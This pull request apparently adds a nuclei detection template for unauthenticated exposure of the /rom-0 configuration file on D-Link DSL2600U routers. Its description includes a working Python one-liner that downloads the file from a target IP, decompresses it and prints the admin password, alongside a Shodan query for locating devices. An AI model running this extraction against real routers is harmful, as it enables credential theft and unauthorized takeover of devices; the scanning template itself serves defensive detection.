### PR TITLE
Create D-Link DSL2600U - Unauthenticated rom-0 Configuration Disclosure

### DIFF
--- a/http/exposures/configs/dlink-dsl2600u-rom0-disclosure.yaml
+++ b/http/exposures/configs/dlink-dsl2600u-rom0-disclosure.yaml
@@ -1,0 +1,32 @@
+id: dlink-dsl2600u-rom0-disclosure
+
+info:
+  name: D-Link DSL2600U - Unauthenticated rom-0 Configuration Disclosure
+  author: 0x_Akoko
+  severity: high
+  description: |
+   Detected D-Link DSL2600U router was found to expose the /rom-0 binary configuration file without authentication. The file contains the admin password stored as LZS-compressed data at byte offset 8568 (0x2178) with no plaintext copy anywhere in the binary.
+  reference:
+    - https://cxsecurity.com/issue/WLB-2026060012
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: d-link
+    product: dsl-2600u
+    shodan-query: DSL-2600U
+    tags: dlink,router,exposure,config,iot,unauth,disclosure
+
+http:
+  - raw:
+      - |
+        GET /rom-0 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(header, "RomPager")'
+          - 'contains(body, "Hdbgarea")'
+          - 'content_length == 16384'
+        condition: and

--- a/http/misconfiguration/dlink-dsl2600u-rom0-disclosure.yaml
+++ b/http/misconfiguration/dlink-dsl2600u-rom0-disclosure.yaml
@@ -14,7 +14,7 @@ info:
     vendor: d-link
     product: dsl-2600u
     shodan-query: DSL-2600U
-    tags: dlink,router,exposure,config,iot,unauth,disclosure
+    tags: dlink,router,misconfig,iot,unauth,disclosure
 
 http:
   - raw:


### PR DESCRIPTION
### To Exploit Password extraction after the template fires:

```
python3 -c "
from routersploit.libs.lzs.lzs import LZSDecompress
import requests, re, sys
data = requests.get(f'http://{sys.argv[1]}/rom-0', timeout=5).content
res, _ = LZSDecompress(data[8568:])
print(re.findall(r'([\x20-\x7e]{5,})', res)[0])
" TARGET_IP
```

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
